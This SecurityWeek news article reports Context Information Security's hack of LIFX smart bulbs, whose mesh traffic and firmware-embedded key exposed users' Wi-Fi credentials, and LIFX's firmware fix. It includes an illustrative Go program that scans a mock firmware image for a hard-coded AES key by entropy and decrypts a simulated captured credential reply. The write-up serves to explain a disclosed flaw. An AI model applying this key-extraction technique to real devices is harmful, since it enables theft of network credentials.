SecurityWeek

Vulnerabilities

Researchers Hack Smartphone-Controlled LED Light Bulbs

Wi-Fi enabled LED light bulbs manufactured by LIFX have been hacked by researchers from Context Information Security, the company said Friday.

The energy-efficient bulbs connect to a Wi-Fi network so that users can control them from a smartphone application. As part of its effort to raise awareness of Internet of Things (IoT) security, Context demonstrated that the lack of protection measures lets an attacker within wireless range control every connected bulb and expose the user's network configuration, including the Wi-Fi credentials.

According to Context, there are three communication paths: bulb to Wi-Fi network, smartphone to bulb, and bulb to bulb over the mesh. The system is designed so that only one master bulb joins the Wi-Fi network, and it is the master that receives commands from the smartphone. The other bulbs receive those commands from the master over an 802.15.4 6LoWPAN wireless mesh network. When a new bulb is added, the master bulb sends it the Wi-Fi details over the mesh in encrypted form.

Vulnerability Found in Smartphone-Controlled LED Light Bulbs

The first security issue the researchers found was that the wireless protocol used for the bulb mesh network was for the most part unencrypted, which allowed them to inject traffic and control the light bulbs with the aid of an Atmel AVR Raven wireless kit. By injecting arbitrary packets into the mesh network, an attacker can ask the master bulb for the Wi-Fi credentials, but that payload is encrypted, Context said. The researchers found a way to decrypt it by extracting the firmware from a bulb and reverse engineering it: the encryption algorithm, the key and the initialization vector could all be recovered from the firmware image.

“Armed with knowledge of the encryption algorithm, key, initialization vector and an understanding of the mesh network protocol we could then inject packets into the mesh network, capture the WiFi details and decrypt the credentials, all without any prior authentication or alerting of our presence,” Context researchers explained in a blog post.
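The attack chain in that quote, worked through as an added example. This is illustrative code written for this article, not Context's tooling or LIFX firmware, and it uses no real LIFX constants, packet formats or firmware offsets. It assumes the weak design the researchers describe: the master bulb encrypts the Wi-Fi credentials with a key and IV stored verbatim in every bulb's firmware, so an attacker who has dumped one bulb's firmware can recover them. The cipher (AES-128-CBC), the credential record layout and the placement of key and IV side by side in the image are all assumptions made for the example. The attacker side slides a window over the dumped image, uses byte entropy to skip code and strings, and validates each high-entropy candidate against a captured mesh reply, which is how a hard-coded key is usually confirmed once a candidate has been located.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
	"math"
)

// Constructed key material for this example (not LIFX's real constants). In the
// vulnerable design every bulb ships with the same key and IV baked into its
// firmware, so one firmware dump unlocks the credential traffic of every network.
var (
	firmwareKey = []byte{0x8b, 0x2f, 0xd4, 0x61, 0xa7, 0x19, 0xce, 0x73, 0x05, 0xe2, 0x9c, 0x48, 0xb6, 0x3d, 0xf0, 0x57}
	firmwareIV  = []byte{0x6e, 0xc1, 0x24, 0x9a, 0x0f, 0xb3, 0x78, 0xd5, 0x42, 0xe9, 0x1c, 0xa0, 0x87, 0x35, 0xfb, 0x5e}
)

// buildFirmware returns a constructed firmware image: low-entropy filler (strings,
// padding) with key||iv embedded at an offset the attacker does not know.
func buildFirmware() []byte {
	var fw bytes.Buffer
	fw.Write(bytes.Repeat([]byte("bulb-fw-filler "), 40))
	fw.Write(firmwareKey)
	fw.Write(firmwareIV)
	fw.Write(bytes.Repeat([]byte{0x00, 0xff, 0x00, 0xff}, 80))
	return fw.Bytes()
}

// masterBulbReply models the master bulb answering a credential request over the
// mesh: AES-128-CBC under the firmware-wide key and IV. The record layout
// "ssid\x00psk", zero-padded to a block boundary, is assumed for the example.
func masterBulbReply(ssid, psk string) []byte {
	pt := []byte(ssid + "\x00" + psk)
	pt = append(pt, make([]byte, aes.BlockSize-len(pt)%aes.BlockSize)...)
	block, _ := aes.NewCipher(firmwareKey)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, firmwareIV).CryptBlocks(ct, pt)
	return ct
}

// windowEntropy returns the Shannon entropy of b in bits per byte.
func windowEntropy(b []byte) float64 {
	var counts [256]float64
	for _, c := range b {
		counts[c]++
	}
	h := 0.0
	for _, n := range counts {
		if n > 0 {
			h -= n / float64(len(b)) * math.Log2(n/float64(len(b)))
		}
	}
	return h
}

// tryDecrypt treats keyIV as key||iv and accepts only output that parses as
// "<printable ssid>\x00<printable psk>" followed by zero padding.
func tryDecrypt(keyIV, ct []byte) (ssid, psk string, ok bool) {
	block, err := aes.NewCipher(keyIV[:16])
	if err != nil || len(ct)%aes.BlockSize != 0 {
		return "", "", false
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, keyIV[16:32]).CryptBlocks(pt, ct)
	parts := bytes.Split(bytes.TrimRight(pt, "\x00"), []byte{0})
	if len(parts) != 2 {
		return "", "", false
	}
	for _, p := range parts {
		for _, c := range p {
			if c < 0x20 || c > 0x7e {
				return "", "", false
			}
		}
	}
	return string(parts[0]), string(parts[1]), true
}

// recoverCredentials slides a 32-byte window over the firmware, keeps the
// high-entropy windows as key||iv candidates and validates each against the
// captured mesh reply: the window that decrypts it is the firmware key.
func recoverCredentials(firmware, captured []byte) (ssid, psk string, err error) {
	for off := 0; off+32 <= len(firmware); off++ {
		w := firmware[off : off+32]
		if windowEntropy(w) < 4.5 {
			continue // strings, code and padding score well below a 32-byte key
		}
		if s, p, ok := tryDecrypt(w, captured); ok {
			return s, p, nil
		}
	}
	return "", "", errors.New("no candidate window decrypted the capture")
}

func main() {
	captured := masterBulbReply("HomeNet", "correct horse battery staple")
	fmt.Println(recoverCredentials(buildFirmware(), captured))
}
```

Running it prints the recovered SSID and passphrase. The entropy filter is a heuristic: in a real image the key and IV need not be adjacent, and the confirming step is usually reading the code that references the candidate buffer. The point the example makes is the one in Context's quote: a key that is identical in every unit and never changes is only as secret as the firmware it ships in, so encrypting the credential exchange with it gives no protection against an attacker who has pulled the firmware off a single bulb.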

Context reported its findings to LIFX, which released a firmware update (version 1.2) to address the issues. In the new firmware, 6LoWPAN mesh traffic is encrypted and new bulbs are added to the network through a secure process. The manufacturer says there is no evidence that the vulnerability was exploited by anyone other than Context, most likely because of the complexity of the attack.

“Hacking into the light bulb was certainly not trivial but would be within the capabilities of experienced cyber criminals,” said Michael Jordon, research director at Context Information Security. “In some cases, these vulnerabilities can be overcome relatively quickly and easily as demonstrated by working with the LIFX developers. In other cases the vulnerabilities are fundamental to the design of the products. What is important is that these measures are built into all IoT devices from the start and if vulnerabilities are discovered, which seems to be the case with many IoT companies, they are fixed promptly before users are affected.”


Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
